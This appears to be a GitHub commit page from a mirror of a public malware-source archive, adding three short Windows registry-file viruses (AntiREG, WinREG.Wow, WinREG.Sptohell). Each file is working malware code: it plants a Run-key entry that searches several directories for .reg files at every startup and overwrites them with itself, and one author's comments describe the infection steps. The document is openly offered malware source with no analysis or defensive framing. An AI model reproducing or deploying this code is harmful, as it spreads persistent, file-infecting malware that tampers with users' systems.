13
1
mirror of https://github.com/vxunderground/MalwareSourceCode synced 2024-06-24 07:58:36 +00:00

Add files via upload

This commit is contained in:
vxunderground 2020-11-14 20:03:30 -06:00 committed by GitHub
parent fc7f440e2c
commit 6f6b922ed1
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
3 changed files with 51 additions and 0 deletions

@ -0,0 +1,13 @@
REGEDIT4
;;-------------------------------;;
;; ;;
;; AntiREG (The First REG Virus) ;;
;; Coded By Lys Kovick ;;
;; Special Thanks To Phage ;;
;; ;;
;;-------------------------------;;
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\]
@="command /c for %i in (%windir%\\system\\*.reg) do regedit /e %i HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\"

@ -0,0 +1,24 @@
REGEDIT 4
;; WinREG.Wow
;; written by SeCoNd PaRt To HeLl
;; for my Virus Database
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\]
@="command /c for %q in (%windir%\*.reg %path%\*.reg C:\*.reg %windir%\system\*.reg) do regedit /e %q HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\"
;; Wow
;; WowWow
;; WowWowWow
;; WowWowWowWow
;; WowWowWowWowWow
;; WowWowWowWowWowWow
;; WowWowWowWowWowWowWow
;; WowWowWowWowWowWowWowWow
;; WowWowWowWowWowWowWow
;; WowWowWowWowWowWow
;; WowWowWowWowWow
;; WowWowWowWow
;; WowWowWow
;; WowWow
;; Wow

@ -0,0 +1,14 @@
REGEDIT 4
;; *************** --> WinREG.Sptohell <-- + + + --> by Second Part To Hell [rRlf] <-- ***************
;;
;; You may ask: "Why do I write such an nonsence virus?"! +fg+ The reason is, that I have nerver seen such an virus
;; in any ezine before. And I think, much ppl don't know, that such viruses exist.
;;
;; The virus itself is fuckin easy. First it copies itself to the Registry, so the code will started by every
;; start of the computer. The code searchs for every *.reg file in 4 directories. If it finds some, it copies
;; itself (the code in the registry) to these .REG-files.
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\]
@="command /c for %q in (%windir%\*.reg %path%\*.reg C:\*.reg %windir%\system\*.reg) do regedit /e %q HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\"